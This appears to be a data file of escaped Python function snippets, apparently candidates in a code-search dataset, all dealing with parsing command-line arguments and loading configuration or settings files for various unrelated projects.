If we could assume a writeable\n # filesystem (we cannot), we could do a 'xmodmap -pke > /tmp/foo'\n # to save the keymap and a 'xmodmap /tmp/foo' to restore it.\n # For now, we'll just look at the Orca modifier keys we support\n # (Caps Lock, KP_Insert, and Insert).]]]\n #\n for keyName in settings.orcaModifierKeys:\n if keyName == \"Caps_Lock\":\n os.system('xmodmap -e \"clear Lock\"')\n if keyName in [\"Caps_Lock\", \"KP_Insert\", \"Insert\"]:\n command = 'xmodmap -e \"keysym %s = %s\"' % (keyName, keyName)\n os.system(command)\n\n if _currentPresentationManager >= 0:\n _PRESENTATION_MANAGERS[_currentPresentationManager].activate()\n\n showMainWindowGUI()\n\n # Only start the D-Bus server if we're in an environment where there \n # is a D-Bus session bus already running. This helps prevent nastiness\n # on the login screen.\n #\n if settings.useDBus:\n dbusserver.init()\n httpserver.init()\n\n return True", "def ReadArguments():\n\n args = ParseArguments()\n\n logging.info('Command line arguments...')\n for arg in vars(args):\n logging.info(str(arg) + ': ' + str(getattr(args, arg)))\n logging.info('')\n\n IsTest(args)\n ProcessCacheSize(args)\n ProcessLineSize(args)\n ProcessMulti(args)\n ProcessMemPattern(args)\n ProcessMemFile(args)", "def read_command_line():\n\n parser = argparse.ArgumentParser(\n description='Mount an S3 bucket as a read-only filesystem')\n\n # All arguments must default to None so that they can be filtered\n # out of the returned dictionary; otherwise, the argument defaults\n # will override settings from the configuration file.\n parser.add_argument('mount-point',\n help='where to mount the bucket')\n parser.add_argument('--bucket', dest='bucket',\n help='S3 bucket to mount')\n parser.add_argument('--access-key', dest='access-key',\n help='access key for the bucket')\n parser.add_argument('--secret-key', dest='secret-key',\n help='secret key for the bucket')\n\n parser.add_argument('--config-file', dest='config-file',\n default='~/.s3viewport.yaml',\n help='path to the configuration file')\n\n parser.add_argument('--no-input', dest='no-input',\n action='store_true', default=None,\n help=\"don't prompt for missing information\")\n parser.add_argument('--foreground', dest='foreground',\n action='store_true', default=None,\n help='run filesystem server in the foreground')\n\n # TODO: Describe configuration file format\n\n args = parser.parse_args()\n return filter_dict(vars(args), lambda k, v: v is not None)", "def _read_settings():\n parser = argparse.ArgumentParser(\n description='extract molecular fragments')\n parser.add_argument('-i', type=str, dest='input',\n help='input JSON file', required=True)\n parser.add_argument('-o', type=str, dest='output',\n help='template to JSON output file, the {} is '\n 'used as placeholder for index',\n required=True)\n parser.add_argument('-s', type=int, dest='size',\n help='number of object per output file', required=True)\n args = vars(parser.parse_args())\n #\n output = {\n 'source': args['input'],\n 'output': args['output'],\n 'size': args['size']\n }\n return output", "def _parse_config(self, config=None):\r\n # TODO: Load user configuration from the file\r\n # self._current_user_name = get_from_conf(\r\n # config, \"user_name\", self._current_user_name\r\n # )\r\n pass", "def read_opts(self):\n\n # process any optlist_ options\n self.valid_opts.check_special_opts(sys.argv)\n\n # ------------------------------------------------------------\n # terminal arguments, first\n\n # cannot have len(argv) <= 1 here, but be 
consistent with other progs\n if len(sys.argv) <= 1 or '-help' in sys.argv:\n print g_help_string\n return 0\n\n if '-hist' in sys.argv:\n print g_history\n return 0\n\n if '-ver' in sys.argv:\n print g_version\n return 0\n\n if '-show_valid_opts' in sys.argv:\n self.valid_opts.show('', 1)\n return 0\n\n # ------------------------------------------------------------\n # read all user options\n\n self.user_opts = self.OL.read_options(sys.argv, self.valid_opts)\n if not self.user_opts: return 1 # error condition\n\n return None # normal completion", "def load_settings(self):\n self.settings = db.get_settings()\n if len(self.settings) < 2:\n while(True):\n consumer_key = raw_input(\"Enter your consumer key\")\n consumer_secret = raw_input(\"Enter your consumer_secret\")\n if len(consumer_key) > 5 and len(consumer_secret) > 5:\n db.add_settings(consumer_key, consumer_secret)\n break", "def process_args(filepath=None):\n if filepath is None:\n parser = argparse.ArgumentParser()\n parser.add_argument('-S', '--settings', dest='settings',\n metavar='FILE', default='settings.json',\n help='Settings file')\n parser.add_argument('unittest_args', nargs='*')\n options, args = parser.parse_known_args()\n filepath = options.settings\n args = [sys.argv[0]] + args\n else:\n args = sys.argv\n SETTINGS.update(DEFAULT_SETTINGS)\n with open(filepath) as infile:\n SETTINGS.update(json.load(infile))\n assert SETTINGS['USERNAME']\n assert SETTINGS['APIKEY']\n return args", "def __init__(self):\n self.options, self.args = self.get_parser().parse_args()\n\n # special case\n self.done=False\n if self.options.encode:\n print generate_password_hash(self.options.encode)\n self.doit()\n self.done=True\n return\n\n self._settings = {}\n if self.options.config:\n _file = self.options.config\n else:\n report(\"You did not pass in a config file with --config, assuming you want %s\"%self.default_file)\n _file = self.default_file\n self._settings.update(self.load(file=_file))\n\n # a few command line options are allowed to override the .ini\n if self.options.port:\n self._settings.update({'flask.port':self.options.port})\n\n # build a special section for things the user wants,\n # ie, things that have been passed into the option\n # parser but are not useful in the .ini\n self._settings.update({'user.shell' : self.options.shell and 'true' or ''})\n self._settings.update({'user.encode_password':self.options.encode})\n def prepare(k,v):\n \"\"\" allow pythonic comments in the .ini files,\n and strip any trailing whitespace.\n\n TODO: move this to ConfigParser subclass.\n \"\"\"\n self._settings[k]=v.strip()\n if '#' in v:\n self._settings[k]=v[:v.find('#')]\n\n [ prepare(k,v) for k,v in self._settings.items() ]\n\n self.doit()", "def initialize():\n # Ensure user config exists\n install(CONFIG_PATH)\n\n # Load preferences into memory\n get_config()", "def setup(parser):\n global debug\n global config\n global file_list\n global job_sets\n global from_saved_state\n\n args = parser.parse_args()\n\n if args.debug:\n debug = True\n print_message('Running in debug mode', 'ok')\n\n # read through the config file and setup the config dict\n config = {}\n if not args.config:\n parser.print_help()\n sys.exit()\n else:\n try:\n confParse = ConfigParser.ConfigParser()\n confParse.read(args.config)\n for section in confParse.sections():\n config[section] = {}\n for option in confParse.options(section):\n opt = confParse.get(section, option)\n if not opt:\n if 'pass' in option and not args.no_monitor:\n opt = getpass('>> ' + option + ': 
')\n else:\n opt = raw_input('>> ' + option + ': ')\n if opt.startswith('[') or opt.startswith('{'):\n opt = json.loads(opt)\n config[section][option] = opt\n except Exception as e:\n msg = 'Unable to read config file, is it properly formatted json?'\n print_message(msg)\n print_debug(e)\n return -1\n\n if args.no_ui:\n config['global']['ui'] = False\n else:\n debug = False\n config['global']['ui'] = True\n\n if args.dry_run:\n config['global']['dry_run'] = True\n else:\n config['global']['dry_run'] = False\n\n if args.no_cleanup:\n config['global']['no_cleanup'] = True\n else:\n config['global']['no_cleanup'] = False\n\n if args.no_monitor:\n config['global']['no_monitor'] = True\n print \"Turning off remote monitoring\"\n else:\n config['global']['no_monitor'] = False\n \n if args.size:\n config['transfer']['size'] = args.size\n else:\n config['transfer']['size'] = 100\n \n if args.viewer:\n print 'Turning on output_viewer mode'\n config['global']['viewer'] = True\n else:\n config['global']['viewer'] = False\n\n # setup config for file type directories\n for key, val in config.get('global').get('output_patterns').items():\n new_dir = os.path.join(\n config['global']['data_cache_path'],\n key)\n if not os.path.exists(new_dir):\n os.makedirs(new_dir)\n if val == 'mpaso.hist.am.timeSeriesStatsMonthly':\n config['global']['mpas_dir'] = new_dir\n elif val == 'mpascice.hist.am.timeSeriesStatsMonthly':\n config['global']['mpas_cice_dir'] = new_dir\n elif val == 'cam.h0':\n config['global']['atm_dir'] = new_dir\n elif val == 'mpaso.rst.0':\n config['global']['mpas_rst_dir'] = new_dir\n elif val == 'rpointer':\n config['global']['rpt_dir'] = new_dir\n elif val == 'mpas-o_in':\n config['global']['mpas_o-in_dir'] = new_dir\n elif val == 'mpas-cice_in':\n config['global']['mpas_cice-in_dir'] = new_dir\n elif 'stream' in val:\n config['global']['streams_dir'] = new_dir\n\n if not os.path.exists(config['global']['output_path']):\n os.makedirs(config['global']['output_path'])\n if not os.path.exists(config['global']['data_cache_path']):\n os.makedirs(config['global']['data_cache_path'])\n\n # setup run_scipts_path\n config['global']['run_scripts_path'] = os.path.join(\n config['global']['output_path'],\n 'run_scripts')\n # setup tmp_path\n config['global']['tmp_path'] = os.path.join(\n config['global']['output_path'],\n 'tmp')\n\n # setup logging\n if args.log:\n log_path = args.log\n else:\n log_path = os.path.join(\n config.get('global').get('output_path'),\n 'workflow.log')\n logging.basicConfig(\n format='%(asctime)s:%(levelname)s: %(message)s',\n datefmt='%m/%d/%Y %I:%M:%S %p',\n filename=log_path,\n filemode='w',\n level=logging.DEBUG)\n\n endpoints = [config['transfer']['source_endpoint'], config['transfer']['destination_endpoint']]\n if not setup_globus(endpoints):\n return -1\n print 'Globus setup complete'\n return config", "def parse_config(cmdline_opts):\n cmdline_opts.add_argument(\n '-p', '--port', help='Enter port number', default=8001)\n cmdline_opts.add_argument(\n '--host', help='Enter host name', default='localhost')\n cmdline_opts.add_argument(\n '-c', '--config', help='Enter config file', default='config.json')", "def read_arguments(argv):\n\tif argv[0] in ('1', '2'):\n\t\tconos_config['endpoint'] = endpoint[argv[0]]\n\telse:\n\t\tusage()\n\n\tif argv[1] in ('dev', 'test', 'int', 'prod'):\n\t\tconos_config['environment'] = argv[1]\n\t\tconos_config['sts_url'] = eval(argv[1] + '_sts_url')\n\t\tconos_config['aicuu_url'] = eval(argv[1] + '_aicuu_url')\n\telse:\n\t\tusage()\n\n\tif 
len(argv) == 6:\n\t\tconos_config['number_threads'] = '1'\n\telse:\n\t\tif argv[6] in ('1', '2', '3', '4', '5', '6', '7', '8'):\n\t\t\tconos_config['number_threads'] = argv[6]\n\t\telse:\n\t\t\tusage()\n\n\tconos_config['client_id'] = argv[2]\n\tconos_config['client_secret'] = argv[3]\n\tconos_config['input_file'] = argv[4]\n\tconos_config['output_file'] = argv[5]", "def init():\n try:\n config = configparser.ConfigParser()\n # look for username.config on both Windows (USERNAME) and Linux (USER)\n if os.name == \"nt\":\n username = os.environ['USERNAME']\n else:\n username = os.environ['USER']\n config_file = username + \".config\"\n if not os.path.isfile(config_file):\n logging.error(\"Configuration file \" + config_file + \" not found.\")\n sys.exit()\n config.read(config_file)\n # database\n global DB_HOST, DB_PORT, DB_NAME, DB_USER, DB_PASSWORD\n DB_HOST = config[\"DATABASE\"][\"db_host\"] if (\"db_host\" in config[\"DATABASE\"]) else None\n DB_PORT = config[\"DATABASE\"][\"db_port\"]\n DB_NAME = config[\"DATABASE\"][\"db_name\"]\n DB_USER = config[\"DATABASE\"][\"db_user\"]\n DB_PASSWORD = config[\"DATABASE\"][\"db_password\"]\n except Exception:\n logger.exception(\"Failed to read config file properly\")\n raise", "def read_config():\n parser = OptionParser()\n parser.add_option(\"-c\", \"--config\", dest=\"conf_path\", type=\"string\", help=\"config file path\")\n (options, args) = parser.parse_args()\n\n config.readfp(open(options.conf_path)) # \"threadbot.cfg\"\n subreddit = config.get(\"threadbot\", \"subreddit\")\n username = config.get(\"threadbot\", \"username\")\n password = config.get(\"threadbot\", \"password\")\n\n return subreddit, username, password", "def cli():\n config, auth, execute_now = read_command_line_arguments()\n main(config, auth, execute_now)", "def setup(self):\n # Set bashrc file\n self._bashrc()\n\n # Return if not running script as root user\n if self.running_as_root is False:\n return\n\n # Return if user prompted doesn't exist\n if self.infoset_user_exists is False:\n return\n\n # Set file permissions\n self._file_permissions()\n\n # Setup systemd\n self._systemd()", "def read_settings(self):\n config = ConfigParser.SafeConfigParser()\n config.read(os.path.dirname(os.path.realpath(__file__)) + '/linode.ini')\n\n # Cache related\n cache_path = config.get('linode', 'cache_path')\n self.cache_path_cache = cache_path + \"/ansible-linode.cache\"\n self.cache_path_index = cache_path + \"/ansible-linode.index\"\n self.cache_max_age = config.getint('linode', 'cache_max_age')", "def parse_user_args():\n ap = argparse.ArgumentParser()\n\n ap.add_argument(\"-j\", \"--json_fname\", help=\"Enter the path to the json \"\n \"filename containing\"\n \"all the paths to the \"\n \"test_collection\", required=True)\n\n ap.add_argument(\"-m\", \"--method\", help=\"Enter the type of baseline run, \"\n \"bm_25, tf_idf or jm_qlm\",\n required=True)\n\n return vars(ap.parse_args())", "def read_settings(self):\n config = ConfigParser.ConfigParser()\n config_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'digital_ocean.ini')\n config.read(config_path)\n\n # Credentials\n if config.has_option('digital_ocean', 'api_token'):\n self.api_token = config.get('digital_ocean', 'api_token')\n\n # Cache related\n if config.has_option('digital_ocean', 'cache_path'):\n self.cache_path = config.get('digital_ocean', 'cache_path')\n if config.has_option('digital_ocean', 'cache_max_age'):\n self.cache_max_age = config.getint('digital_ocean', 'cache_max_age')\n\n # Private IP 
Address\n if config.has_option('digital_ocean', 'use_private_network'):\n self.use_private_network = config.getboolean('digital_ocean', 'use_private_network')\n\n # Group variables\n if config.has_option('digital_ocean', 'group_variables'):\n self.group_variables = ast.literal_eval(config.get('digital_ocean', 'group_variables'))", "def process_command_line():\n global dry_run, username, release_path, skip_upload\n\n # Get command-line options\n try:\n opts, args = getopt.gnu_getopt(sys.argv[1:], options, long_options)\n except getopt.GetoptError as err:\n print(str(err))\n usage()\n sys.exit(2)\n\n # Default values for flags\n username = getpass.getuser()\n\n for opt, val in opts:\n if opt in (\"-h\", \"--help\"):\n usage()\n sys.exit(0)\n\n elif opt in (\"-u\", \"--user\"):\n username = val\n\n elif opt in (\"-s\", \"--skip-upload\"):\n skip_upload = True\n\n elif opt in (\"-n\", \"--dry-run\"):\n print(\"Dry-run mode - files will not be uploaded or modified\")\n dry_run = True\n\n # Mandatory parameters\n # (none)\n\n # Change to release directory, current if not specified\n try:\n release_path = args[0]\n os.chdir(release_path)\n except IndexError:\n release_path = os.getcwd()", "def GetArgs():\n \n UserArgs = {}\n UserArgs['help'] = False\n UserArgs['RsodFileName'] = \"\"\n UserArgs['BiosPathX64'] = \"\"\n\n for i in range(1,len(sys.argv)):\n if sys.argv[i].lower() == \"-help\" : UserArgs[\"help\"] = True\n elif sys.argv[i].lower() == \"-h\" : UserArgs[\"help\"] = True\n elif \"-rsodfile=\" in sys.argv[i].lower() : UserArgs['RsodFileName'] = sys.argv[i].split ('=', 1)[1]\n elif \"-biospathx64=\" in sys.argv[i].lower() : UserArgs['BiosPathX64'] = sys.argv[i].split ('=', 1)[1]\n\n return UserArgs", "def autostart_read_options(self,options_file):\n config=ConfigParser.ConfigParser()\n config.read(options_file)\n return config", "def read(self, sys):\n\n # if no options are set, print help\n if len(sys.argv) == 1:\n sys.argv.append('-h')\n\n # make sure parameter file is processed first\n # so that all options on the command line\n # have precedence\n if any(['@' in xx[0] for xx in sys.argv]):\n paridx = [xx[0] for xx in sys.argv].index('@')\n parfile = sys.argv.pop(paridx)\n sys.argv.insert(1, parfile)\n\n opt = self.parser.parse_args()\n\n # transform some parameters to proper types\n try:\n if 1 != opt.beamscaling:\n opt.beamscaling = [float(xx)\n for xx\n in opt.beamscaling.split(',')]\n\n if opt.feed:\n opt.feed = self.parse_range(opt.feed)\n\n if opt.pol:\n opt.pol = self.parse_range(opt.pol)\n\n if opt.window:\n opt.window = self.parse_range(opt.window)\n\n if opt.mapscans:\n opt.mapscans = self.parse_range(opt.mapscans)\n\n if opt.refscans:\n opt.refscans = self.parse_range(opt.refscans)\n\n except ValueError:\n print('ERROR: there is a malformed parameter option')\n print(' please check your command line settings and try again.')\n sys.exit()\n\n opt.units = opt.units.lower()\n\n return opt", "def _generate_settings(self):\n settings = {}\n settings[\"api_client_id\"] = input(\"(OPTIONAL) Please enter your Twitch API Client ID: \") #Get API Client ID first so I can use API to get user ID\n #Save JSON\n fileIO.save_json(\"settings.json\", settings)\n name = False\n while not name: #While name not set\n name = input(\"Please enter the username of your Twitch account: \").lower()\n userID = self._get_user_id(name)\n if not userID:\n name = False\n settings[\"userid\"] = userID\n settings[\"oauth\"] = input(\"Please enter the oauth token for your Twitch account: \")\n if 
settings[\"oauth\"].startswith(\"oauth:\"): #If the oauth token starts with oauth:, remove it\n settings[\"oauth\"] = settings[\"oauth\"][6:]\n settings[\"error_webhook\"] = input(\"Please enter the Discord WebHook URL you would like errors to be sent to: \")\n #Save JSON\n fileIO.save_json(\"settings.json\", settings)", "def read_environment(self):\n # Setup credentials\n if os.getenv(\"DO_API_TOKEN\"):\n self.api_token = os.getenv(\"DO_API_TOKEN\")\n if os.getenv(\"DO_API_KEY\"):\n self.api_token = os.getenv(\"DO_API_KEY\")", "def parse():\n rcParams = configparser.ConfigParser(defaults=defaults())\n rcParams.read([os.path.join(os.getcwd(), 'watershed_workflowrc'),\n os.path.join(os.getcwd(), '.watershed_workflowrc'),\n os.path.join(home(), '.watershed_workflowrc')])\n return rcParams", "def init_args():\n parser = argparse.ArgumentParser(\n description=\"DeltaSherlock Client software.\")\n parser.add_argument('-v', '--version', action='version', version=VERSION)\n parser.add_argument('-c', '--config', action='store', dest='config_file',\n default='./config.ini', help=\"Path to config file. [default: \\\n %(default)s]\")\n parser.add_argument('-d', '--daemon', action='store_true', dest='daemon',\n default=False, help=\"Run in daemon mode. [default: \\\n %(default)s]\")\n return parser.parse_args()", "def parse_args(self, argv):\n super(UpdaterDaemon, self).parse_args(argv)\n\n self.stdout = self.options.log_file\n self.stderr = self.options.error_log\n\n config = self.options.config\n if config is None:\n config = os.path.join(os.path.dirname(__file__), 'config.py')\n config = os.path.normpath(os.path.abspath(config))\n configdir, configfile = os.path.split(config)\n configfile, ext = os.path.splitext(configfile)\n if configdir not in sys.path:\n sys.path.insert(0, configdir)\n self.config = __import__(configfile)", "def setUp(self):\n self.parser = command_line.get_args()", "def read_command_line_arguments() -> Tuple[\n LocalConfig, AuthConfig, Optional[List[str]]\n]:\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"config\", type=str, help=\"Path to the main config file\"\n )\n parser.add_argument(\n \"auth\", type=str, help=\"Path to the authentication config file\"\n )\n parser.add_argument(\n \"--execute-now\",\n type=str,\n help=\"\"\"A set of channel names to execute immediately, or none to\n determine automatically based on the current time.\"\"\",\n nargs=\"*\",\n choices=notification_channels.keys(),\n )\n args = parser.parse_args()\n\n config_file = read_local_config(args.config)\n auth_file = read_local_auth(args.auth)\n\n return config_file, auth_file, args.execute_now", "def parse_args_to_dict():\n locust_config_info[\"run_time\"] = args.t[0]\n locust_config_info[\"ramp_up\"] = args.r[0]\n locust_config_info[\"print_stats\"] = args.print_stats\n locust_config_info[\"summary_only\"] = args.summary_only\n locust_config_info[\"users\"] = args.u[0]\n locust_config_info[\"test_name\"] = args.f[0]\n locust_config_info[\"tsin\"] = args.tsin[0]\n print \"login style: {} l[0]: {}\".format(args.l, args.l[0])\n locust_config_info[\"login_style\"] = args.l[0]\n locust_config_info[\"request_timeout\"] = args.request_timeout[0]\n return locust_config_info", "def config_parse_file():\n global ANGELCO_EMAIL, ANGELCO_PASSWORD\n\n print(\"Parsing the config file...\")\n config = configparser.ConfigParser()\n with open('dwh.cfg') as configfile:\n config.read_file(configfile)\n\n ANGELCO_EMAIL = config.get('ANGELCO', 'EMAIL')\n ANGELCO_PASSWORD = config.get('ANGELCO', 
'PASSWORD')", "def _parse_command_line_arguments():\n global config\n # Get command line args for vispy\n argnames = ['vispy-backend=', 'vispy-gl-debug', 'vispy-glir-file=',\n 'vispy-log=', 'vispy-help', 'vispy-profile=', 'vispy-cprofile',\n 'vispy-dpi=', 'vispy-audit-tests']\n try:\n opts, args = getopt.getopt(sys.argv[1:], '', argnames)\n except getopt.GetoptError:\n opts = []\n # Use them to set the config values\n for o, a in opts:\n if o.startswith('--vispy'):\n if o == '--vispy-backend':\n config['default_backend'] = a\n logger.info('vispy backend: %s', a)\n elif o == '--vispy-gl-debug':\n config['gl_debug'] = True\n elif o == '--vispy-glir-file':\n config['glir_file'] = a\n elif o == '--vispy-log':\n if ',' in a:\n verbose, match = a.split(',')\n else:\n verbose = a\n match = None\n config['logging_level'] = a\n set_log_level(verbose, match)\n elif o == '--vispy-profile':\n config['profile'] = a\n elif o == '--vispy-cprofile':\n _enable_profiling()\n elif o == '--vispy-help':\n print(VISPY_HELP)\n elif o == '--vispy-dpi':\n config['dpi'] = int(a)\n elif o == '--vispy-audit-tests':\n config['audit_tests'] = True\n else:\n logger.warning(\"Unsupported vispy flag: %s\" % o)", "def parse_command_line():\r\n\r\n parser = argparse.ArgumentParser(description='User args')\r\n parser.add_argument(\"--action\", choices=['train', 'predict', 'demo', 'test'], required=True, help=\"Choose action.\")\r\n parser.add_argument(\"--model\", choices=['vgg', 'unet', 'fpn'], required=True, help=\"Choose model.\")\r\n parser.add_argument(\"--dataset\", choices=['full', 'small'], required=True, help=\"Choose dataset.\")\r\n\r\n return parser.parse_args()", "def parse_args():\n \n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'config',\n help='Config file')\n parser.add_argument(\n '--quiet',\n '-q',\n action='store_true',\n help='do not print to console'\n )\n parser.add_argument(\n '--password',\n '-p',\n action='store_true',\n help='Set password in keyring.'\n )\n parser.add_argument(\n '--update',\n '-u',\n action='store_true',\n help='Only add transactions after last date in database.'\n )\n parser.add_argument(\n '--mark_seen',\n '-m',\n action='store_true',\n help='Mark fetched emails as seen.'\n )\n\n return parser.parse_args()", "def command_line_start(argv, program_name):\n cl_parser = argparse.ArgumentParser(description='Tinkerforge Data Logger')\n\n cl_parser.add_argument('config_file', help=\"Path to the configuration file\")\n cl_parser.add_argument('-v', action=\"store_true\", dest=\"validate\",\n help=\"Just process the validation of the configuration file\")\n\n results = cl_parser.parse_args(argv)\n\n arguments_map = {}\n arguments_map[CONSOLE_CONFIG_FILE] = results.config_file\n arguments_map[CONSOLE_VALIDATE_ONLY] = results.validate\n\n return arguments_map", "def readProperties():\n separator = \":\"\n props = {}\n \n with open('upgrade.properties') as f:\n\n for line in f:\n if separator in line:\n\n # Find the name and value by splitting the string\n name, value = line.split(separator, 1)\n\n # Assign key value pair to dict\n # strip() removes white space from the ends of strings\n props[name.strip()] = value.strip()\n\n props['JDA_HOME'] = props['JDA_HOME'].replace('-', ':')\n globs.props = props\n\n globs.UserPassDict = {}\n for user_cat in globs.CRED_DICT:\n globs.UserPassDict[props[user_cat]] = props[globs.CRED_DICT[user_cat]]", "def cmd_user(args):", "def ReadUserFlags(rules, argv):\n def Error(msg):\n print(color.Format('[ {error}Error{end} ] {msg}', {'msg': 
msg}))\n sys.exit(1)\n\n annotations = universe.Annotations.ExtractAnnotations(\n rules, restrict_to=['@DefineFlag'])\n defined_flags = annotations['@DefineFlag'].keys()\n try:\n p = getopt.getopt(argv, '', ['%s=' % f for f in defined_flags])\n except getopt.GetoptError as e:\n Error(str(e))\n\n if p[1]:\n Error('Undefined command arguments: %s' % p[1])\n\n sys.exit(1)\n user_flags = {k[2:]: v for k, v in p[0]}\n return user_flags", "def setup():\n\tglobal config_parser, config_file\n\tglobal prefix\n\n\tif os.path.islink(sys.argv[0]):\n\t\tlink = os.readlink(sys.argv[0])\n\n\t\tif not os.path.isabs(link):\n\t\t\tlink = os.path.join(os.path.dirname(sys.argv[0]), link)\n\n\t\tprefix = os.path.dirname(os.path.abspath(link))\n\telse:\n\t\tprefix = os.path.dirname(os.path.abspath(sys.argv[0]))\n\n\tconfig_parser = ConfigParser.ConfigParser()\n\tset_defaults()\n\n\tconfig_file = os.path.join (xdg_config_home, \"sushi\", \"nigiri\")\n\n\tif not check_config_file(config_file):\n\t\tprint \"Config file creation failed. Aborting.\"\n\t\treturn\n\n\tread_config_file()", "def ReadOptions(self, args):\n (opts, args) = getopt.getopt(args, 'vxi:p:h:', ('help',))\n for (key, val) in opts:\n if key == '-h': self.hash = val\n elif key == '-i': self.input = val\n elif key == '-v':\n self.verbose = True\n util.verbose = True\n elif key == '-x':\n self.verbose = True\n util.verbose = True\n self.extra_verbose = True\n util.extra_verbose = True\n elif key == '-p': self.profile_dest = val\n elif key == '--help':\n PrintUsage()\n sys.exit(0)\n\n if not self.input:\n if 'GRIT_INPUT' in os.environ:\n self.input = os.environ['GRIT_INPUT']\n else:\n self.input = 'resource.grd'\n\n return args", "def do_prompt(self):\n # we need _something_ in the dictionary even if the user decides to use all defaults\n # otherwise for some unknown reason it won't work\n user_in = {'__meta__': '__user_input__'}\n\n print('Please enter the information asked for in the following prompts in order to configure your deployment')\n # get the config information from the user\n for p in self.prompts:\n answer = input(p['prompt'])\n if len(answer.strip()) > 0 and 'variable' in p.keys():\n user_in[p['variable']] = answer\n\n # return the data\n return user_in", "def updateSettings(self):\n self.parser.read(self.file)\n self.showTicker = self.parser.getboolean('Settings', 'showTicker')\n self.verbose = self.parser.getboolean('Settings', 'verbose')\n self.sleepTime = self.parser.getint('Settings', 'sleeptime')\n self.saveGraph = self.parser.getboolean('Settings', 'saveGraph')\n self.graphDPI = self.parser.getint('Settings', 'graphDPI')", "def startup(self):\n self.settings = sublime.load_settings(self.settings_base)\n self.sublime_settings = sublime.load_settings(self.sublime_base)", "def setup_config(self, args=None):\n self.config_parse(args=args)", "def cli():\n prog_desc = 'Generate the default settings ini file.'\n parser = argparse.ArgumentParser(description=prog_desc)\n parser.add_argument('-o', '--outpath', help='Where to save the do file. 
'\n 'If not supplied, then the '\n 'file is written to STDOUT.')\n args = parser.parse_args()\n manager = SettingsManager()\n\n default_ini = manager.generate_default_ini(args.outpath)\n if default_ini:\n print(default_ini)\n else:\n print(f'Saved do file to \"{args.outpath}\"')", "def parse_arguments(self):\n \n for arg in sys.argv[1:]:\n (key, sep, value) = arg.partition(\"=\")\n if sep != \"=\":\n raise ProcessorError(\"Illegal argument '%s'\" % arg)\n self.update_data(key, value)", "def cli(ctx):\n config = get_config_data()\n\n ctx.obj = config", "def readSettingsFile():\n settingsPath = os.environ['OCT_FIRE_SETTINGS'] if 'OCT_FIRE_SETTINGS' in os.environ else None\n if not settingsPath:\n settingsPath = findSettingsFile()\n logging.warning('Using settings from %s', settingsPath)\n settingsStr = goog_helper.readFile(settingsPath)\n settingsDict = json.loads(settingsStr)\n # logging.warning('settings %s', settingsDict)\n return settingsDict", "def parse_args():\n\n parser = argparse.ArgumentParser(description='CLI to store Actisense-NGT Gateway values to InfluxDB and publish via MQTT')\n parser.add_argument('--config', '-c', type=str, required=True, help='JSON configuraton file with path')\n return parser.parse_args()", "def parseOptions(self):\n\n\t\tparser = OptionParser()\n parser.add_option(\n \"-u\",\n \"--user\",\n dest=\"user\",\n help=\"enter a user or 'all'\"\n )\n\n parser.add_option(\n \"-p\",\n \"--projects\",\n dest=\"projects\",\n help=\"enter a project or 'all'\"\n )\n (self.options, self.args) = parser.parse_args()", "def readSettings(self):\n settings = QtCore.QSettings()\n # defaults to the current directory path\n current_dir_abspath = os.path.abspath('')\n defaultValue = QtCore.QString(current_dir_abspath)\n # Warning:\n # QSettings.value can return different types (QVariant types) depending on the platform it's running on,\n # so the safest way to use it is always casting the result to the desired type, e.g.: int(settings.value(\"myKey\")).\n output_directory = settings.value(\"output_directory\", defaultValue=defaultValue).toString()\n self.ui.outputDirLineEdit.setText(output_directory)", "def load_settings(self):\n\n self.std = settings.settings", "def _load_config(self, args: argparse.Namespace):\n #\n # Load a config, filename may or may-not be provided...\n #\n try:\n self._config = TortugaScriptConfig.load(args.config)\n\n except ConfigException as ex:\n print(str(ex))\n sys.exit(0)\n\n #\n # Override the config with any provided argument values\n #\n if args.url:\n self._config.url = args.url\n if args.username:\n self._config.username = args.username\n if args.password:\n self._config.password = args.password\n if args.token:\n self._config.token = args.token\n self._config.verify = args.verify", "def parse_user_arguments():\n\n ap = argparse.ArgumentParser()\n\n ap.add_argument(\"-m\", \"--method\",\n help=\"Enter the type of baseline run, \"\n \"bm_25, tf_idf or jm_qlm\", required=True)\n\n ap.add_argument(\"-j\", \"--json_fname\", help=\"Enter the path to the json \"\n \"filename containing\"\n \"all the paths to the \"\n \"test_collection\",\n required=True)\n\n return vars(ap.parse_args())", "def read_args():\r\n global args\r\n parser = argparse.ArgumentParser(\r\n description='Executes create, list-nodes, list-all, execute, backup, list-backups and rollback tasks on AWS '\r\n 'system')\r\n\r\n # What the code will do? 
The actions...\r\n parser.add_argument('action', help='Type of work', choices=[\"create\", \"list-nodes\", \"list-all\", \"execute\", \"backup\",\r\n \"list-backups\", \"roll-back\", \"terminate-all\"])\r\n parser.add_argument('--customer-id', help='Shows customer ID', required=False)\r\n parser.add_argument('--node-type', help='Shows node type, values can be \"Manager\" or \"Peer\"',\r\n choices=[\"Manager\", \"Peer\"], required=False)\r\n parser.add_argument('--script', help='Shows the script that will be executed on Aws instance', required=False)\r\n parser.add_argument('--node-id', help='Shows node (Instance) ID on AWS', required=False)\r\n parser.add_argument('--backup-id', help='Shows snapshot ID on AWS', required=False)\r\n\r\n args = parser.parse_args()", "def get_config(args):\n load_args={}\n with open(args.config, 'r') as f:\n for line in f:\n key, value = line.strip().split('=')\n try:\n value = int(value)\n except ValueError:\n try:\n value = float(value)\n except ValueError:\n value = value\n load_args[key] = value\n args.__dict__.update(load_args)", "def setup_settings():\n settings = DEFAULT_SETTINGS\n if os.environ.get(\"MUTALYZER_SETTINGS\"):\n configuration_path = os.environ[\"MUTALYZER_SETTINGS\"]\n with open(configuration_path) as f:\n configuration_content = \"[config]\\n\" + f.read()\n loaded_settings = configparser.ConfigParser()\n loaded_settings.optionxform = str\n loaded_settings.read_string(configuration_content)\n loaded_settings = {\n sect: dict(loaded_settings.items(sect))\n for sect in loaded_settings.sections()\n }[\"config\"]\n for k in loaded_settings:\n if loaded_settings[k] in {\"yes\", \"true\", \"1\"}:\n loaded_settings[k] = True\n elif loaded_settings[k] in {\"no\", \"false\", \"0\"}:\n loaded_settings[k] = False\n elif loaded_settings[k].isnumeric():\n loaded_settings[k] = int(loaded_settings[k])\n settings.update(loaded_settings)\n\n return settings", "def _set_default_args(self):\n self._parser.add_argument(\"username\")\n self._parser.add_argument(\"password\")\n self._parser.add_argument(\n \"--start\",\n help=\"Start date for the scraper in iso format, eg: 2017-11-19\",\n type=str,\n default=None,\n )\n self._parser.add_argument(\n \"--end\",\n help=\"End date for the scraper in iso format\",\n type=str,\n default=None,\n )\n 